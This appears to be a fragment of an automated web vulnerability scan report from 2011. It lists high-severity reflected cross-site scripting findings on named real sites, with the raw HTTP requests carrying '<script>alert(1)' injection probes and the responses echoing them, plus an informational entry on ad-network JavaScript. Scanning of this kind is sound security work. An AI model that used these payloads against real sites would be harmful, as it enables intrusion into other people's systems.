HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 02:24:01 GMT Server: Microsoft-IIS/6.0 p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 602 <html> <head> <title>Error</title> <link rel="stylesheet" type="text/css" href="/webhire2.css" title="Webhire Stylesheet"> </head> <body bgcolor="#FFFFFF"> <table width=100% border=0> <tr> <t ...[SNIP]... <li> Invalid value 2f4ee<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sh.webhire.com |
Path: | /profiler/login_page.pfl |
GET /profiler/login_page.pfl Host: sh.webhire.com Proxy-Connection: keep-alive Referer: http://sh.webhire.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JobIDs=; AccountID=726; Site=I |
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 02:23:56 GMT Server: Microsoft-IIS/6.0 p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: PROFILE_LDAP_ID=; expires=Thu, 24-Mar-2011 02:23:56 GMT; path=/ Set-Cookie: USERNAME=; expires=Thu, 24-Mar-2011 02:23:56 GMT; path=/ Set-Cookie: CANDIDATE_ID=; expires=Thu, 24-Mar-2011 02:23:56 GMT; path=/ Set-Cookie: ProfileId=; expires=Thu, 24-Mar-2011 02:23:56 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4000 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <A href="https://sh.webhire ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.ipredator.se |
Path: | / |
GET /?886bd"><script>alert(1)< Host: www.ipredator.se Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 02:16:30 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny8 Set-Cookie: PHPSESSID=3347d82ed3 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 6610 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <input type="hidden" name="886bd"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-403/d3/jsc/fmr |
GET /bar/v16-403/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://thepiratebay.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=jhmxpQoBADYAAET |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFCap=1512B933,196008 Set-Cookie: FFcat=790,3281,15;expires Set-Cookie: FFad=0;expires=Thu, 24 Mar 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "823f84fd-80e3-49ea7 Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=108 Expires: Thu, 24 Mar 2011 02:17:12 GMT Date: Thu, 24 Mar 2011 02:15:24 GMT Connection: close Content-Length: 6061 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2764;var zzPat='';var zz ...[SNIP]... undefined' || ainfo.length == 0) { var ainfo =''; } /* */ var zzLogData ="a=891378;x=3840;g=0,0;c function zzPop() { var zzAg = navigator.userAgent var zzAOL = (zzAg.indexOf('aol') != -1); var zzNS6 = (zzAg.indexOf('netscape6 var z ...[SNIP]... |